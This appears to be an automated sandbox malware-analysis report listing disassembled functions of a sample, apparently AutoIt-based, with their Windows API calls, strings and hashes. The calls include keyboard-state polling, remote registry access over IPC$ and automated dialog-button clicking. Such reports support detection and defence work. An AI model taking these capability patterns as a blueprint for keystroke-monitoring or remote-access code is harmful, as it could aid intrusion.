                                                                          • Opcode Fuzzy Hash: 8625d88f7a170d5b7e08eb4067ae101ff9999bff818452aa4be9f1965bf2e0a2
                                                                          • Instruction Fuzzy Hash: 1BC14BB1D0021DAADF21DF95CC85AEEB7BDEF45310F0040ABF609E6251EB709A948F65
                                                                          Function 002E5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 002E5BF1
                                                                          • GetMenuItemCount.USER32(00397890), ref: 00320E7B
                                                                          • GetMenuItemCount.USER32(00397890), ref: 00320F2B
                                                                          • GetCursorPos.USER32(?), ref: 00320F6F
                                                                          • SetForegroundWindow.USER32(00000000), ref: 00320F78
                                                                          • TrackPopupMenuEx.USER32(00397890,00000000,?,00000000,00000000,00000000), ref: 00320F8B
                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00320F97
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 2751501086-0
                                                                          • Opcode ID: 1ed156cd54a80e7f9e40ef02bb0275a1629b6552a97ed5df911c7393358a338b
                                                                          • Instruction ID: fc88a9fb680937287ff326596d5c3004753d64faddb271bdf13d531596248489
                                                                          • Opcode Fuzzy Hash: 1ed156cd54a80e7f9e40ef02bb0275a1629b6552a97ed5df911c7393358a338b
                                                                          • Instruction Fuzzy Hash: 3A713530654725BFEB2A8F55DC85FAAFF68FF04728F204216F6246A1D1C7B16864CB90
                                                                          Function 0033AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,00360980), ref: 0033AF4E
                                                                          • GetDriveTypeW.KERNEL32(00000061,0038B5F0,00000061), ref: 0033B018
                                                                          • _wcscpy.LIBCMT ref: 0033B042
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                          • String ID: L,6$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 2820617543-1647761162
                                                                          • Opcode ID: b6654e3f87ad53054b382de44b04df88c538e185c7b8c7fc8a54cb96cbe5da95
                                                                          • Instruction ID: 05d836aa4af19a47acbb70716c13f8ea09cd704fef6a0849a89c126762ffd0c3
                                                                          • Opcode Fuzzy Hash: b6654e3f87ad53054b382de44b04df88c538e185c7b8c7fc8a54cb96cbe5da95
                                                                          • Instruction Fuzzy Hash: DB51CA301283059BC316EF14CCD2AABF7A9EF94340F50482DF596572A2EB30ED29CB42
                                                                          Function 003283FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          • _memset.LIBCMT ref: 00328489
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003284BE
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003284DA
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003284F6
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00328520
                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00328548
                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00328553
                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00328558
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 1411258926-22481851
                                                                          • Opcode ID: 9f4ab3efffe42d092aee2cb0e18cb6d420126723f93ad72f3063a6a034dd3ec9
                                                                          • Instruction ID: 871f02df7c768482d8f053e07333cb8feb13e9df11b230b1a71613baf6d30986
                                                                          • Opcode Fuzzy Hash: 9f4ab3efffe42d092aee2cb0e18cb6d420126723f93ad72f3063a6a034dd3ec9
                                                                          • Instruction Fuzzy Hash: 68414672C6022DABCF16EBA5DC91DEEB778FF04340F40416AE905A2161EA709E24CF90
                                                                          Function 0035147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                          • API String ID: 3964851224-909552448
                                                                          • Opcode ID: f449235f2fb59e91b5c14c8b2ba29c570e861fe7ac3ea50a6e712f2ff77d36fb
                                                                          • Instruction ID: 92ea060120e27423fe4d545512d62b4041f2b1d007e329ca0911afe9bcbe23a3
                                                                          • Opcode Fuzzy Hash: f449235f2fb59e91b5c14c8b2ba29c570e861fe7ac3ea50a6e712f2ff77d36fb
                                                                          • Instruction Fuzzy Hash: C1418D7456025ACBEF12EF50D881EEA3324EF56345F6048A5FD52572A2EB30ED2DCB60
                                                                          Function 00335882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                            • Part of subcall function 002E153B: _memmove.LIBCMT ref: 002E15C4
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003358EB
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00335901
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00335912
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00335924
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00335935
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 2279737902-1007645807
                                                                          • Opcode ID: e214d070cf1d9e1a6f6f40df94336d91bf3bba281f51d8a40b0c86cc08938391
                                                                          • Instruction ID: 3be05bf6629f8ce3959bcf1d14725f6b3fe64e5c2e78c11fc0a4eee6f15b9a74
                                                                          • Opcode Fuzzy Hash: e214d070cf1d9e1a6f6f40df94336d91bf3bba281f51d8a40b0c86cc08938391
                                                                          • Instruction Fuzzy Hash: FA11983559026AB9D711B762DC5AEFFBB7CFBE1B50F800469B411920D1DFB01D14CAA1
                                                                          Function 00334C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 208665112-3771769585
                                                                          • Opcode ID: 347d3f09b48ce58627e05b82c94593ac9baeaaf9d9342393b986b6e0efcc3c0f
                                                                          • Instruction ID: 1aedb99ff53b2a8deee11f115d2234dc3878510c696b40034605961449811fe8
                                                                          • Opcode Fuzzy Hash: 347d3f09b48ce58627e05b82c94593ac9baeaaf9d9342393b986b6e0efcc3c0f
                                                                          • Instruction Fuzzy Hash: E811E431515109BFCB16BB60DC8AEEBBBBCDF41710F0482B5F54896191EFB0AD968B50
                                                                          Function 00335530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00335535
                                                                            • Part of subcall function 002F0859: timeGetTime.WINMM(?,00000002,002DC22C), ref: 002F085D
                                                                          • Sleep.KERNEL32(0000000A), ref: 00335561
                                                                          • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00335585
                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003355A7
                                                                          • SetActiveWindow.USER32 ref: 003355C6
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003355D4
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003355F3
                                                                          • Sleep.KERNEL32(000000FA), ref: 003355FE
                                                                          • IsWindow.USER32 ref: 0033560A
                                                                          • EndDialog.USER32(00000000), ref: 0033561B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1194449130-3405671355
                                                                          • Opcode ID: e4b5a19146aa10e9c277417e1e84c1cff9824c90c7e5ce92d3688db6bc9e9cd1
                                                                          • Instruction ID: 8cd8199b978afbdafa937b9af0ca24ccf9a7a356f4ac01869d9db5226905c148
                                                                          • Opcode Fuzzy Hash: e4b5a19146aa10e9c277417e1e84c1cff9824c90c7e5ce92d3688db6bc9e9cd1
                                                                          • Instruction Fuzzy Hash: 9D216D70208645AFE7475F60ECCAA273B6EEB87345F02641AF502811B1DFF2DD549A72
                                                                          Function 0033DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • CoInitialize.OLE32(00000000), ref: 0033DC2D
                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0033DCC0
                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0033DCD4
                                                                          • CoCreateInstance.OLE32(00363D4C,00000000,00000001,0038B86C,?), ref: 0033DD20
                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0033DD8F
                                                                          • CoTaskMemFree.OLE32(?,?), ref: 0033DDE7
                                                                          • _memset.LIBCMT ref: 0033DE24
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0033DE60
                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0033DE83
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0033DE8A
                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0033DEC1
                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0033DEC3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                          • String ID:
                                                                          • API String ID: 1246142700-0
                                                                          • Opcode ID: bc7d0a956b89e92fe7be47b522f93e17b5e2ee46585e82e1f26206113a1243cd
                                                                          • Instruction ID: cb8fefa928e87c69e392c4efcf66c37a49e6c8d227e3543bfe4c3e016cebc538
                                                                          • Opcode Fuzzy Hash: bc7d0a956b89e92fe7be47b522f93e17b5e2ee46585e82e1f26206113a1243cd
                                                                          • Instruction Fuzzy Hash: E2B1F875A10119AFDB05DFA4D889DAEBBB9FF48304F1084A9E905EB261DB70EE41CF50
                                                                          Function 0033081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00330896
                                                                          • SetKeyboardState.USER32(?), ref: 00330901
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00330921
                                                                          • GetKeyState.USER32(000000A0), ref: 00330938
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00330967
                                                                          • GetKeyState.USER32(000000A1), ref: 00330978
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 003309A4
                                                                          • GetKeyState.USER32(00000011), ref: 003309B2
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 003309DB
                                                                          • GetKeyState.USER32(00000012), ref: 003309E9
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00330A12
                                                                          • GetKeyState.USER32(0000005B), ref: 00330A20
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 7940d39d9e86dd16ce87c682ef3574e48d4a1cf35ae0c04bfd4c45730d677027
                                                                          • Instruction ID: baaaadcb0d028c207c3a251f23927573dd79103e3fdc511fcf694d479103f889
                                                                          • Opcode Fuzzy Hash: 7940d39d9e86dd16ce87c682ef3574e48d4a1cf35ae0c04bfd4c45730d677027
                                                                          • Instruction Fuzzy Hash: 8C51CD3090478819FB3ADBB184A57EABFB49F01780F09459DD5C25F5C3DBA49A4CCB91
                                                                          Function 0032CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 0032CE1C
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0032CE2E
                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0032CE8C
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0032CE97
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0032CEA9
                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0032CEFD
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0032CF0B
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0032CF1C
                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0032CF5F
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0032CF6D
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0032CF8A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0032CF97
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 81b3a1c6086a70a67b3ea2166ced5414cf296dfe6306adcc2c4c6423ffd3a252
                                                                          • Instruction ID: f60fac9053e753de598a3068ff549c6093067348e0bc07e3138cc41ee4958172
                                                                          • Opcode Fuzzy Hash: 81b3a1c6086a70a67b3ea2166ced5414cf296dfe6306adcc2c4c6423ffd3a252
                                                                          • Instruction Fuzzy Hash: AD517371B10205BFDF19CF68DD86AAEBBBAEB88711F14812DF516D7290D7B0AD008B50
                                                                          Function 002D2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29AB: GetWindowLongW.USER32(?,000000EB), ref: 002D29BC
                                                                          • GetSysColor.USER32(0000000F), ref: 002D25AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ColorLongWindow
                                                                          • String ID:
                                                                          • API String ID: 259745315-0
                                                                          • Opcode ID: 33926ae83d50427bd2e370f75b7d151af69e3cbc313dd996ed0b78c6e5091f97
                                                                          • Instruction ID: 9a73987a715353be1330ef23a68c623bdeff68e8bef67966039ef6f47693e5c4
                                                                          • Opcode Fuzzy Hash: 33926ae83d50427bd2e370f75b7d151af69e3cbc313dd996ed0b78c6e5091f97
                                                                          • Instruction Fuzzy Hash: A041E430014244EFDB265F28D889BB93769EB26331F1942A2FD668A2E1D7708C55DB61
                                                                          Function 002E29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002E2A3E,?,00008000), ref: 002F0BA7
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002E2ADF
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002E2C2C
                                                                            • Part of subcall function 002E3EBE: _wcscpy.LIBCMT ref: 002E3EF6
                                                                            • Part of subcall function 002F386D: _iswctype.LIBCMT ref: 002F3875
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                          • API String ID: 537147316-3738523708
                                                                          • Opcode ID: c6daf24babfca33876bf1dbd9abfd0a52be1224c4a63b2629ca229651e5d2c5e
                                                                          • Instruction ID: 798dbe91b3ee96cd4fa2873b5d9e504cdc15382245fe196f5763b54715ac9d6a
                                                                          • Opcode Fuzzy Hash: c6daf24babfca33876bf1dbd9abfd0a52be1224c4a63b2629ca229651e5d2c5e
                                                                          • Instruction Fuzzy Hash: 8302D330058381DFC725EF21C891AAFBBE5AF89344F50492DF49A972A2DB30D959CF52
                                                                          Function 002D4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: __i64tow__itow__swprintf
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 421087845-2263619337
                                                                          • Opcode ID: 2e8df9ca3cdcd86851634561ede05646d8a5f48ea2066e0dd3370cfc9502f336
                                                                          • Instruction ID: f176ec9a8a89a073651e08e864829f47ff4895ed789cdd0b0e7e4866627fd0cd
                                                                          • Opcode Fuzzy Hash: 2e8df9ca3cdcd86851634561ede05646d8a5f48ea2066e0dd3370cfc9502f336
                                                                          • Instruction Fuzzy Hash: 1A41D171624209AFDB25EF78D842E7AB3E9EB45340F20446EE249D7392EA719D61CB10
                                                                          Function 00357777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0035778F
                                                                          • CreateMenu.USER32 ref: 003577AA
                                                                          • SetMenu.USER32(?,00000000), ref: 003577B9
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00357846
                                                                          • IsMenu.USER32(?), ref: 0035785C
                                                                          • CreatePopupMenu.USER32 ref: 00357866
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00357893
                                                                          • DrawMenuBar.USER32 ref: 0035789B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
